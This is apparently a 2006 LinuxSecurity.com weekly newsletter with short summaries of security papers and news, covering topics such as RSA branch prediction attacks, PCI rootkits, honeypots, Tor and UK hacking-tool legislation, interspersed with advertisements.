RFID with
Bio-Smart Card in Linux - In this paper, we describe the integration
of fingerprint template and RF smart card for clustered network, which is
designed on Linux platform and Open source technology to obtain biometrics
security. Combination of smart card and biometrics has achieved in two step
authentication where smart card authentication is based on a Personal Identification
Number (PIN) and the card holder is authenticated using the biometrics template
stored in the smart card that is based on the fingerprint verification. The
fingerprint verification has to be executed on central host server for security
purposes. Protocol designed allows controlling entire parameters of smart
security controller like PIN options, Reader delay, real-time clock, alarm
option and cardholder access conditions.
pgp Key
Signing Observations: Overlooked Social and Technical Considerations
- While there are several sources of technical information on using pgp in
general, and key signing in particular, this article emphasizes social aspects
of key signing that are too often ignored, misleading or incorrect in the
technical literature. There are also technical issues pointed out where I
believe other documentation to be lacking. It is important to acknowledge
and address social aspects in a system such as pgp, because the weakest link
in the system is the human that is using it. The algorithms, protocols and
applications used as part of a pgp system are relatively difficult to compromise
or 'break', but the human user can often be easily fooled. Since the human
is the weak link in this chain, attention must be paid to actions and decisions
of that human; users must be aware of the pitfalls and know how to avoid them.
Bulletproof
Virus Protection - Protect your network from costly security
breaches with Guardian Digital’s multi-faceted security applications.
More then just an email firewall, on demand and scheduled scanning detects
and disinfects viruses found on the network. Click
to find out more!
Take advantage of our Linux Security discussion
list! This mailing list is for general security-related questions and comments.
To subscribe send an e-mail to security-discuss-request@linuxsecurity.com
with "subscribe" as the subject.
Earn an NSA recognized IA
Masters Online - The NSA has designated Norwich University a center
of Academic Excellence in Information Security. Our program offers unparalleled
Infosec management education and the case study affords you unmatched consulting
experience. Using interactive e-Learning technology, you can earn this esteemed
degree, without disrupting your career or home life.
Protect your home and business networks with the free, community version of
EnGarde Secure Linux. Don't rely only on a firewall to protect your network,
because firewalls can be bypassed. EnGarde Secure Linux is a security-focused
Linux distribution made to protect your users and their data.
Thank you for reading the LinuxSecurity.com
weekly security newsletter. The purpose of this document is to provide our readers
with a quick summary of each week's most relevant Linux security headline.
A New Vulnerability In RSA Cryptography
20th, November, 2006
"Branch Prediction Analysis is a recent attack vector against RSA public-key cryptography on personal computers that relies on timing measurements to get information on the bits in the private key. However, the method is not very practical because it requires many attempts to obtain meaningful information, and the current OpenSSL implementation now includes protections against those attacks. However, German cryptographer Jean-Pierre Seifert has announced a new method called Simple Branch Prediction Analysis that is at the same time much more efficient that the previous ones, only needs a single attempt, successfully bypasses the OpenSSL protections, and should prove harder to avoid without a very large execution penalty."
Deep CPU pipelines paired with the CPU’s ability to fetch and issue multiple instructions at every machine cycle led to the concept of superscalar processors. Superscalar processors admit a theoretical or best-case performance of less than 1 machine cycle per completed instructions, cf. [She]. However, the inevitably required branch instructions in the underlying machine languages were very soon recognized as one of the most painful performance killers of superscalar processors. Not surprisingly, CPU architects quickly invented the concept of branch predictors in order to circumvent those performance bottlenecks. Thus, it is not surprising that there has been a vibrant and very practical research on more and more sophisticated branch prediction mechanisms, cf. [PH,Sha,She]. Unfortunately, a very recent paper, cf. [ASK], identified branch prediction as a novel and unforeseen side-channel, thus being another new security threat within the computer security field. Let us elaborate a little bit on this connection between side-channel attacks and modern computer-architecture ingredients.
Book Review: Security Threat Mitigation and Response
24th, November, 2006
When it comes to network security, Cisco is actively involved in coming up with some of the very best solutions to troublesome problems that unexpectedly occur. When it comes to books about security, however, Cisco Press has an uneven batting average. Some of the books are good, while others leave you wondering how they made it through the editing stage. Looking at words like “paradigm” on the back cover of this title, my spine began to get a familiar tingle, but in this case, I am happy to report, they have hit a home run.
Cisco Security MARS (Monitoring, Analysis, and Response System) is a product intended to work with your network and identify (as well as prevent) problems early on. It is also intended to boost data privacy to the point where compliance becomes a certainty. Given the customization that is possible and the importance of getting it right, a book on the topic that is detailed and easy to read is almost a necessity.
Security researcher John Heasman released a paper this week describing a way to hide malicious code on graphics and network cards in such a way as to avoid detection and survive a full re-installation of the operating system. The paper (PDF), published on Wednesday, builds on the work presented by Heasman earlier this year, describing ways to use the Advanced Configuration and Power Interface (ACPI) functions available on almost all motherboards to store and run a rootkit that could survive a reboot. The current paper outlines ways to use the expansion memory available on Peripheral Component Interconnect (PCI) cards, such as graphics cards and network cards.
This paper is a sequel to my “Learn Information Gathering By Example”. This paper will go through looking for Vulnerabilities in remote system(s), which is what you would do in a Penetration Test after gathering information on the target. I will be using real world examples for nearly everything in this paper. Although I covered scanning a network range for possible targets in my last paper I will cover it again in this paper, because it is related. I am aware that 99.5 % of people will already know how to do this, and should know how to do it. For the sake of complete beginners I will cover it again.
Using Nepenthes Honeypots to Detect Common Malware
20th, November, 2006
In the past few years, a number of serious flaws in Windows have been exposed, including MS03-026 [ref 1], the flaw that Blaster [ref 2] used to spread in 2003, right up to the recent Mocbot/Wargbot worm [ref 3] which exploited MS06-040 [ref 4] from August 2006. The number of distinct pieces of malware exploiting these flaws has rapidly increased over the same time period. There are several variants of most worms and many more than that of most of the bot families, such as Agobot, Phatbot, Sdbot, and so on. As is now well-known, bots are collections of compromised "zombie" computers used together in a botnet network for nefarious purposes. In the paper, they give detection rates for newly capture malware range between 73% and 84% across four different antivirus engines. Clearly, relying on antivirus software is not going to work for everyone, all the time. In this paper we describe how a particular low-interaction honeypot, Nepenthes [ref 6], can be used to quickly alert an administrator to a network compromise. It captures malware and can assist in containing and removing the infection.
Viruses and worms pose some of the most formidable threats in the modern computer security land-
scape. With some virus writers on the bleeding edge of technology, making use of 0-day exploits and
innovative techniques to circumvent system security features. However, for every Blaster, there’s a worm that repeatedly attempts to infect the same machine. For every 100,000 node botnet Spybot infection there’s 20 variants that fail to get as far as even connecting to an IRC server. For every Netsky, there’s an intended mass mailer that crashes before it sends a single copy of itself out. From exploitable vulnerabilities in their code to incomprehensible goofs there’s no shortage of evidence that a large proportion of virus writers aren’t quite as capable as they would like others to think. This paper will take a look at the legacy of these slightly less than expert level virus writers, and examine the threat they continue to pose.
The report advises implementation of a "least privilege" environment to reduce the impact of such attacks.
Marco Peretti, chief technical officer at security firm BeyondTrust, agreed with the findings of the Sans Institute, urging users to follow the "principle of least privilege" in setting user access controls, permissions and rights.
Peretti also suggested restricting or limiting the use of active code such as JavaScript or ActiveX in browsers.
.htaccess files provides us with ways to make configuration changes on a per-directory basis. This file works well in Apache Web Server and on Linux/Unix. Also, it works on Windows based system with Apache Web server. There are several things that developers, site owners and webmasters can do by using .htaccess file. Let’s look at some of them: Prevent directory browsing, Redirect visitors from one page or directory to another, Password protection for directories, Change the default index page of a directory, Prevent hot-linking of images from your website.
Web 2.0 is the novel term coined for new generation Web applications. start.com, Google maps, Writely and MySpace.com are a few examples. The shifting technological landscape is the driving force behind these Web 2.0 applications. On the one hand are Web services that are empowering server-side core technology components and on the other hand are AJAX and Rich Internet Application (RIA) clients that are enhancing client-end interfaces in the browser itself. XML is making a significant impact at both presentation and transport (HTTP/HTTPS) layers. To some extent XML is replacing HTML at the presentation layer while SOAP is becoming the XML-based transport mechanism of choice.
I first touched a BSD box in around 1994, thanks to the donation of a BSD/OS system and SLIP connection from UUNet to my high school. It was love at first sight! Discovering FreeBSD not long after, I've been a regular FreeBSD user since around 1995, although I only became involved in FreeBSD development in 1999, gaining a "commit bit" to help maintain the FreeBSD portions of the Coda distributed file system, a project I had worked on while at Carnegie Mellon University. My undergraduate degree is in Logic and Computation, from CMU's philosophy department, along with a double major in Computer Science, but it became clear that my greatest interest lay in operating systems and security. After working on file system ACLs and mandatory access control for FreeBSD, I started the TrustedBSD Project in 2000, with the goal of bringing more advanced security features to the platform. In 2001, while working at Network Associates Laboratories (NAI Labs, and later McAfee Research), I proposed and became Principal Investigator on a research project as part of DARPA's CHATS research program, which was investigating security and open source. This project included sponsoring and developing UFS2, OpenPAM, the TrustedBSD MAC Framework, NSS support, PAE support, several network stack hardening projects (including syncache and syncookies for FreeBSD), GEOM, and GBDE.
The following steps will help you secure personal storage drives, both on and off the network. Recent events in the industry have been cause for concern, leading IT professionals to understand that new policies and technologies must be set in place to protect information being stored on personal storage devices.
Developed to help human rights activists to communicate safely via the net, Zimmermann's software is deployed by more than 35,000 businesses and millions of individuals. In the last 15 years encryption has grow from a product of questionable legal status to a government-mandated approach to protecting sensitive ecommerce transactions. Strong encryption used to be viewed as something 'dodgy', prompting the question: "what are you trying to hide". Now firms are legally required to encrypt data or risk falling foul of information disclosure laws and corporate governance regulations.
Zimmermann says PGP has been "more successful than I first envisioned", even though email encryption technology is less commonplace than many pundits predicted in the late 1990s.
Why Administrative Passwords Will Never Be Like Nuclear Missile Launchers
23rd, November, 2006
During the past few months many people have lamented that Windows lacks a nuclear missile style control option for administrator passwords. Surely you've read about or seen photographs of missile silos where two operators, separated by a distance greater than the span of a single human's arms, must each simultaneously turn a key in a switch to launch a missile. Such a fail-safe is important when considering missile launches: presumably a nation can't thus be committed to global thermonuclear war on the deranged whims of a single raving lunatic.
The Seven Deadly Sins of Records Retention (And how to avoid them)
25th, November, 2006
Sure, you're thinking, records retention can be deadly. Deadly dull. "I don't want to own that," TriWest Healthcare CSO John Pontrelli said to himself when people came poking around about it - this after the US Department of Defense, TriWest's only customer, announced it was going to audit the company's document retention practices. "It's just one of those thankless kinds of jobs," Pontrelli continues, noting that he'd rather keep his security staff focused on its core business. "I can't become the retention police." Records retention has always been about as sexy as Birkenstocks with socks. Even the nomenclature - retention - has an unsavoury connotation, something better left to the clinically uptight. But recent legal actions have made document retention programs not just boring but risky.
Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of "Google hacking", although that is how most of the sites vulnerable to RFI attacks are found).
By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.
As far as Kerry Anderson is concerned, insiders are as big a threat to her company's IT security as worms and spyware -- perhaps bigger. And like malware, insiders come in many variants. Anderson, a vice president in the information security group at Fidelity Investments Brokerage Company, explained the different types of insider threats and ways companies can address them at the MIS Training Institute's Annual Conference and Expo on Control and Audit of Information Technology in Boston last week. The best way to deal with any potential inside threat, she said, is to let everyone know Big Brother is watching them and that they can be fired for any security violation.
We have all three hours of the audio for the recent "Privacy is Dead" talk available at the HOPE Number Six site. You can either stream it or download it, just like all the other HOPE talks.
Hacking Email: 99 Tips To Make You More Secure And Productive
22nd, November, 2006
When people read out a phone number, they use "phone rhythm." No one has to explain "phone rhythm," we all just seem to do it automatically, "…713...555...12…34". Similarly, when we answer a phone call we all say, "Hello." No one taught us to do that, but somehow we all seemed to pick it up. So why is it that when it comes to emails, there are no accepted standards? Even though 6 billion emails are sent every day, almost no one agrees about simple things like email etiquette, how to organize a note, or whether emails are considered private or not. The 99 tips in this article make up the best in email practices. From how to ethically use the ‘BCC:' to what attachments will make your mobile emailing compatible with everyone else's, this list covers everything you need to know about emailing.
As I mentioned in my DEFCON highlights article back in September, I learned about a group called kaos.theory who discussed an anonymity tool called SAMAEL (Secure, Anonymizing, Megalomaniacal, Autonomous, Encrypting Linux). I haven’t seen this tool been made available yet, so I decided to take a look at their first offering: Anonym.OS, a LiveCD built on OpenBSD that allows you to utilize the Tor network, along with Privoxy, to surf the Internet anonymously. To start, I thought it might be useful to understand what the two underlying tools were all about before I jumped into Anonym.OS.
The Tor network is an intriguing concept: build a bunch of servers around the Internet to route traffic through so that your connections can’t be traced. Why would you want to do that? Well, for several reasons, like you don’t want your web activity being traced by marketing people or spammers so they can come back and get you later. The really cool thing about Tor is that it’s not a hosted service; it’s a free toolset so that people can set up their own to help support the project and share their bandwidth.
IBM completes UK government Linux security testing
21st, November, 2006
Questions in the House of Lords in June 2005 revealed that the Cabinet Office's Central Sponsor for Information Assurance unit was developing proof-of-concept systems using Security Enhance Linux to support remote working and web services. In May this year IBM revealed that it was involved in the project along with Red Hat, Tresys Technology, and Belmin Group.
The new Police and Justice Act, published today, could criminalise legitimate IT security activity. There are fears amongst security experts that changes it makes to the Computer Misuse Act will make it illegal to distribute some vital tools.
The new law modifies the Computer Misuse Act of 1990, the cornerstone of Britain's anti-hacking law. The changes make clear for the first time that denial of service attacks are an offence; but they also address the distribution of hacking tools.
The new Act will make a person guilty of an offence "if he supplies or offers to supply any article believing that it is likely to be used to commit, or to assist in the commission of, [a hacking offence]." The word "article" is defined in the Act to include "any program or data held in electronic form".
